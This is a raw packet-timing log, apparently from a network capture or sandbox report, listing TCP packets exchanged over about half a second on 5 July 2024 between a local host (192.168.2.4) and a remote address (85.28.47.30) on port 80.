                                                                Jul 5, 2024 04:36:07.742918015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742928982 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742948055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742950916 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.742959976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742970943 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.742978096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742991924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743001938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743005037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743016958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743027925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743046999 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743069887 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743189096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743211031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743221998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743232012 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743257046 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743266106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743278027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743288994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743302107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743314981 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743331909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743335009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743412971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743424892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743436098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743448019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743469000 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743477106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743479013 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743489981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743505001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743532896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743535042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743546009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743556976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743578911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743596077 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743700027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743710995 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743725061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743742943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743746996 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743756056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743767977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743769884 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743787050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743798018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743799925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743810892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743830919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743833065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743844032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743846893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743856907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743868113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743880987 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743889093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743896008 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743902922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743912935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743923903 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743933916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743942976 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743947029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743957996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743968964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.743969917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743983984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.743997097 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744002104 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744009018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744013071 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744033098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744038105 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744050026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744061947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744082928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744102001 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744113922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744129896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744141102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744144917 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744170904 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744183064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744193077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744194984 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744200945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744232893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744257927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744262934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744275093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744286060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744312048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744337082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744344950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744355917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744366884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744378090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744394064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744402885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744415045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744422913 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744431973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744442940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744450092 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744455099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744468927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744491100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744502068 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744502068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744514942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744525909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744533062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744563103 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744621038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744632959 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744645119 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744661093 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744662046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744688034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744692087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744704962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744715929 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744723082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744735003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744743109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744745970 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744759083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744771004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744796991 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744796991 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744806051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744869947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744884014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744895935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744908094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744923115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744924068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744935989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744949102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.744951010 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744965076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.744995117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.745029926 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.745042086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.745053053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.745064974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.745075941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.745081902 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.745090008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.745099068 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.745102882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.745126963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.745148897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.833710909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.833724022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.833735943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.833791971 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.833827972 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.833836079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.833848000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.833859921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.833872080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.833887100 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.833918095 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.833918095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.833930016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.833940983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.833952904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.833962917 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.833985090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.833988905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.833998919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834012032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834012985 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.834028006 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.834058046 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.834686041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834697008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834707975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834741116 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.834754944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834767103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834772110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.834779978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834794044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834805965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.834831953 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.834867954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834878922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834888935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834901094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834913015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834916115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.834923029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834933043 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.834934950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834948063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.834965944 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.834999084 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835129976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835141897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835153103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835182905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835206032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835217953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835228920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835238934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835251093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835269928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835290909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835292101 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835304976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835318089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835328102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835355997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835376024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835382938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835393906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835403919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835417032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835431099 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835450888 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835540056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835551977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835562944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835573912 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835583925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835587025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835606098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835617065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835619926 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835633039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835635900 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835647106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835660934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835695028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835762024 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835774899 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835784912 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835798979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835809946 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835812092 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835823059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835828066 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835834980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835849047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.835860014 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.835887909 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.836620092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.836632013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.836642027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.836652994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.836666107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.836673975 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.836678028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.836684942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.836693048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.836704016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.836713076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.836738110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.983906984 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.988708973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.163784981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.163811922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.163825035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.163836002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.163849115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.163858891 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.163861036 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.163875103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.163883924 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.163919926 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164050102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164071083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164083004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164096117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164123058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164155006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164165974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164175987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164201021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164215088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164228916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164239883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164248943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164273024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164280891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164293051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164294958 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164324045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164324999 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164335966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164345980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164365053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164386034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164391994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164406061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164438963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164438963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164450884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164453030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164463043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164478064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164500952 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164611101 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164652109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164652109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164657116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164669991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164704084 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164720058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164741993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164753914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164764881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164784908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164786100 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164797068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164809942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164810896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164836884 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164865971 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164904118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164916039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164926052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164937973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164948940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164948940 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164963007 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.164963007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164980888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164992094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.164992094 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.165011883 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.165050983 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.165167093 CEST804973085.28.47.30192.168.2.4
